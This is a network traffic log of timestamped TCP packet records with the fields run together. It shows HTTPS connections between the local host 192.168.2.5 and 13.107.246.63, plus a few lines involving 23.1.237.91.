                                                                                                                                                                          Nov 23, 2024 19:02:09.737066031 CET4434988013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:09.739893913 CET4434988013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:09.739979982 CET49880443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:09.740442038 CET49880443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:09.740489006 CET4434988013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:09.740519047 CET49880443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:09.740535975 CET4434988013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:09.748086929 CET49888443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:09.748112917 CET4434988813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:09.748496056 CET49888443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:09.748673916 CET49888443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:09.748697996 CET4434988813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:09.796200037 CET4434988113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:09.799336910 CET4434988113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:09.799585104 CET49881443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:09.799721956 CET49881443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:09.799741030 CET4434988113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:09.803045034 CET49889443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:09.803069115 CET4434988913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:09.803235054 CET49889443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:09.803442001 CET49889443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:09.803452015 CET4434988913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:09.866648912 CET4434988213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:09.866796970 CET4434988213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:09.866887093 CET49882443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:09.866970062 CET49882443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:09.866970062 CET49882443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:09.867000103 CET4434988213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:09.867026091 CET4434988213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:09.871093988 CET49890443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:09.871143103 CET4434989013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:09.871273041 CET49890443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:09.871490955 CET49890443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:09.871504068 CET4434989013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:11.547719002 CET4434988613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:11.549338102 CET49886443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:11.549393892 CET4434988613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:11.549823999 CET49886443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:11.549838066 CET4434988613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:11.594707012 CET4434988813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:11.595163107 CET49888443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:11.595206976 CET4434988813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:11.595921993 CET49888443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:11.595932961 CET4434988813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:11.653485060 CET4434988513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:11.653912067 CET49885443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:11.653994083 CET4434988513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:11.654328108 CET49885443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:11.654342890 CET4434988513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:11.666975021 CET4434989013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:11.667368889 CET49890443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:11.667464018 CET4434989013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:11.667716980 CET49890443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:11.667730093 CET4434989013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:11.801289082 CET4434988913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:11.801834106 CET49889443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:11.801848888 CET4434988913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:11.804589033 CET49889443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:11.804594040 CET4434988913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.051934958 CET4434988613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.057224989 CET4434988613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.057311058 CET4434988613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.057416916 CET49886443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.085573912 CET4434988813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.085761070 CET4434988813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.085851908 CET49888443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.094381094 CET49886443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.094429016 CET4434988613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.096571922 CET49888443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.096616030 CET4434988813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.108819008 CET4434989013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.108900070 CET4434989013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.108983040 CET49890443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.109597921 CET4434988513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.109675884 CET4434988513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.111110926 CET49885443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.170758009 CET49890443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.170788050 CET4434989013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.183631897 CET49885443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.183633089 CET49885443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.183681011 CET4434988513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.183706999 CET4434988513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.265661955 CET49896443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.265760899 CET4434989613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.265862942 CET49896443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.269356966 CET49896443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.269388914 CET4434989613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.279494047 CET49897443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.279581070 CET4434989713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.279665947 CET49897443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.282543898 CET49897443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.282572985 CET4434989713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.291601896 CET49898443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.291645050 CET4434989813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.291850090 CET49898443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.292870998 CET49899443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.292922020 CET4434989913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.292989016 CET49899443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.299417019 CET49898443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.299446106 CET4434989813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.302170038 CET49899443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.302202940 CET4434989913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.415616989 CET4434988913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.418719053 CET4434988913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.418771982 CET4434988913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.418801069 CET49889443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.418848038 CET49889443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.430870056 CET49889443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.430881023 CET4434988913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.430890083 CET49889443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.430893898 CET4434988913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.435470104 CET49902443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.435535908 CET4434990213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:12.435612917 CET49902443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.438359022 CET49902443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:12.438389063 CET4434990213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.010962963 CET4434989713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.011606932 CET49897443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.011620998 CET4434989713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.012072086 CET49897443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.012079000 CET4434989713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.112976074 CET4434989813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.113466978 CET49898443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.113497019 CET4434989813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.116866112 CET49898443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.116872072 CET4434989813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.171679974 CET4434989613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.172106981 CET4434989913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.172307968 CET49896443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.172339916 CET4434989613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.172529936 CET49899443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.172564983 CET4434989913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.172822952 CET49896443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.172830105 CET4434989613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.173001051 CET49899443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.173013926 CET4434989913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.207341909 CET4434990213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.207727909 CET49902443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.207808018 CET4434990213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.208089113 CET49902443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.208103895 CET4434990213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.445790052 CET4434989713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.445986032 CET4434989713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.446085930 CET49897443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.446460962 CET49897443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.446494102 CET4434989713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.446540117 CET49897443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.446569920 CET4434989713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.449631929 CET49910443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.449733973 CET4434991013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.449824095 CET49910443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.449975014 CET49910443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.450011015 CET4434991013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.593642950 CET4434989813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.596784115 CET4434989813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.596846104 CET4434989813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.596914053 CET49898443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.597383976 CET49898443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.597410917 CET4434989813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.597431898 CET49898443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.597440004 CET4434989813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.631598949 CET49912443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.631613016 CET4434991213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.631715059 CET49912443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.632055044 CET49912443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.632062912 CET4434991213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.651748896 CET4434989613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.655311108 CET4434989613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.659111023 CET49896443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.661955118 CET49896443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.661992073 CET4434989613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.662009001 CET49896443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.662015915 CET4434989613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.673119068 CET4434989913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.676197052 CET4434989913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.676249981 CET49899443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.695975065 CET4434990213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.699040890 CET4434990213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.699126959 CET49902443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.707308054 CET49899443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.707351923 CET4434989913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.707412004 CET49899443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.707427979 CET4434989913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.726129055 CET49902443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.726130009 CET49902443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.726181030 CET4434990213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.726211071 CET4434990213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.754822016 CET49914443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.754832983 CET4434991413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.754899979 CET49914443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.755016088 CET49914443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.755023003 CET4434991413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.770049095 CET49915443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.770119905 CET4434991513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.770198107 CET49915443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.773418903 CET49916443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.773437977 CET4434991613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.773504972 CET49916443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.776413918 CET49915443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.776453018 CET4434991513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:14.776484966 CET49916443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:14.776494026 CET4434991613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:15.777190924 CET4434979723.1.237.91192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:15.777297974 CET49797443192.168.2.523.1.237.91
                                                                                                                                                                          Nov 23, 2024 19:02:16.322089911 CET4434991013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:16.322664022 CET49910443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:16.322680950 CET4434991013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:16.323107958 CET49910443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:16.323118925 CET4434991013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:16.428288937 CET4434991213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:16.428894043 CET49912443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:16.428901911 CET4434991213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:16.429379940 CET49912443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:16.429384947 CET4434991213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:16.560632944 CET4434991413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:16.561208963 CET49914443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:16.561218977 CET4434991413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:16.561687946 CET49914443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:16.561691999 CET4434991413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:16.585333109 CET4434991613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:16.585899115 CET49916443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:16.585917950 CET4434991613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:16.586345911 CET49916443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:16.586349964 CET4434991613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:16.646948099 CET4434991513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:16.647802114 CET49915443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:16.647840977 CET4434991513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:16.648212910 CET49915443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:16.648219109 CET4434991513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:16.774379969 CET4434991013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:16.777623892 CET4434991013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:16.779052019 CET49910443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:16.779123068 CET49910443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:16.779123068 CET49910443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:16.779154062 CET4434991013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:16.779175997 CET4434991013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:16.782224894 CET49920443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:16.782310009 CET4434992013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:16.782399893 CET49920443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:16.782574892 CET49920443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:16.782603025 CET4434992013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:16.874413967 CET4434991213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:16.877969027 CET4434991213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:16.878005981 CET4434991213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:16.878089905 CET49912443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:16.882900000 CET49912443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:16.882922888 CET4434991213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:16.882961035 CET49912443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:16.882966042 CET4434991213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:16.885890007 CET49921443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:16.885953903 CET4434992113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:16.886030912 CET49921443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:16.886214018 CET49921443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:16.886231899 CET4434992113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:17.011670113 CET4434991413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:17.016175985 CET4434991413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:17.016343117 CET49914443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:17.016443014 CET49914443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:17.016448975 CET4434991413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:17.016458035 CET49914443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:17.016460896 CET4434991413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:17.019032955 CET49922443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:17.019083977 CET4434992213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:17.023061991 CET49922443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:17.023222923 CET49922443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:17.023248911 CET4434992213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:17.037754059 CET4434991613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:17.040956020 CET4434991613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:17.043014050 CET49916443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:17.043178082 CET49916443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:17.043190956 CET4434991613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:17.043201923 CET49916443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:17.043205976 CET4434991613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:17.045411110 CET49923443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:17.045461893 CET4434992313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:17.045556068 CET49923443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:17.045679092 CET49923443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:17.045692921 CET4434992313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:17.111177921 CET4434991513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:17.114562035 CET4434991513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:17.114602089 CET4434991513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:17.117139101 CET49915443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:17.117403030 CET49915443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:17.117429018 CET4434991513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:17.117444992 CET49915443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:17.117453098 CET4434991513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:17.120131969 CET49924443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:17.120218039 CET4434992413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:17.120316982 CET49924443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:17.120469093 CET49924443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:17.120501041 CET4434992413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:18.690387964 CET4434992113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:18.690963984 CET49921443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:18.691066027 CET4434992113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:02:18.691404104 CET49921443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:02:18.691418886 CET4434992113.107.246.63192.168.2.5
